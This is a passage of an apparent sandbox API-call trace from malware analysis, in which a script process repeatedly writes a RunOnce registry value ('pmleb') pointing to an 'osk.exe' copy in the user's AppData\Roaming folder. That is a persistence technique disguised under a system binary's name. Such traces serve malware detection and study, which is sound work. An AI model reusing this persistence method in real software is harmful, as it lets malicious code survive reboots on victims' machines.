ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.657] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.657] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.657] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.657] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x43 [0081.657] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.657] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x44 [0081.657] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.658] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x43 [0081.658] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.658] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.658] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.658] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.658] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.658] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.658] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.658] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.658] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.658] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.658] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", 
cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.659] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.659] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.659] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.659] RegCloseKey (hKey=0x280) returned 0x0 [0081.659] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.659] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.659] SetTimer (hWnd=0x20280, nIDEvent=0x20bf, uElapse=0xa, lpTimerFunc=0x0) returned 0x20bf [0081.659] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.672] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.672] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.672] KillTimer (hWnd=0x20280, uIDEvent=0x20bf) returned 1 [0081.672] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.672] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.672] IUnknown:Release (This=0x787518) returned 0x1 [0081.672] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, 
[7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.672] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.672] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.672] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.672] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.672] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.673] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, 
riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.673] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.673] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.673] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x44 [0081.673] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.673] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x45 [0081.673] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), 
pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.673] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x44 [0081.674] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.674] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.674] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.674] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.674] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.674] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.674] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.674] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.674] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.674] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.674] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, 
lpUsedDefaultChar=0x0) returned 54 [0081.674] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.674] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.674] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.674] RegCloseKey (hKey=0x280) returned 0x0 [0081.674] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.674] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.674] SetTimer (hWnd=0x20280, nIDEvent=0x20c0, uElapse=0xa, lpTimerFunc=0x0) returned 0x20c0 [0081.675] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.687] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.687] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.687] KillTimer (hWnd=0x20280, uIDEvent=0x20c0) returned 1 [0081.687] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.687] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.687] IUnknown:Release (This=0x787518) returned 0x1 [0081.688] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) 
returned 0x0 [0081.688] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.688] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.688] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.688] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.688] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.688] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, 
[7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.688] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.688] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.688] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x45 [0081.688] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.688] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x46 [0081.688] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, 
pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.689] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x45 [0081.689] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.689] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.689] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.689] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.689] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.689] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.689] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.689] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.689] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.689] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.689] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.689] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.690] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.690] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.690] RegCloseKey (hKey=0x280) returned 0x0 [0081.690] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.690] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.690] SetTimer (hWnd=0x20280, nIDEvent=0x20c1, uElapse=0xa, lpTimerFunc=0x0) returned 0x20c1 [0081.690] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.703] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.703] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.703] KillTimer (hWnd=0x20280, uIDEvent=0x20c1) returned 1 [0081.703] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.703] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.703] IUnknown:Release (This=0x787518) returned 0x1 [0081.703] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.704] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.704] FileSystemObject:IDispatch:Invoke (in: 
This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.704] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.704] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, 